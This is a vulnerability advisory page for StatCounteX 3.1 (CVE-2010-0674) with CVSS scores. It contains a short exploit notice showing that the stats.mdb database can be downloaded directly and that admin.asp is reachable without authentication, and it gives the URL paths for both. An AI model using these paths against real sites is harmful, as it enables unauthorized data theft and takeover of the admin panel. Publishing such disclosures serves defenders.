StatCounteX 3.1 database disclosure and administrative access

2010-02-15 / 2010-02-16
Credit: Phenom
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2010-0674
CWE: CWE-264


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

# Exploit Title: StatCounteX 3.1 Multiple Vulnerabilities # Date: 12/02/2010 # Author: Phenom # Software Link: http://www.2enetworx.com/dev/projects/download.asp?pid=4&rid=34 # Version: 3.1 # Tested on: Windows xp sp3 # CVE : # Code : ------------------------------------------------------ _____ _ | __ \| | | |__) | |__ ___ _ __ ___ _ __ ___ | ___/| '_ \ / _ \ '_ \ / _/\| '_ ` _ \ | | | | | | __/ | | | (_) | | | | | | |_| |_| |_|\___|_| |_|\/__/|_| |_| |_| ------------------------------------------------------ ########### StatCounteX 3.1 Multiple Vulnerabilities ############ # # Author : Phenom # # app version : 3.1 # ################################################################################# ####### Exploit ################################################################# # # 1 - Database Disclosure Vulnerability # # http://site.com/path/stats.mdb # # 2 - Remote Admin Access Vulnerability # # http://site.com/path/admin.asp # # here you can edit tables and configuration # #################################################################################

References:

http://xforce.iss.net/xforce/xfdb/56264
http://www.exploit-db.com/exploits/11434
http://packetstormsecurity.org/1002-exploits/statcountex-disclose.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top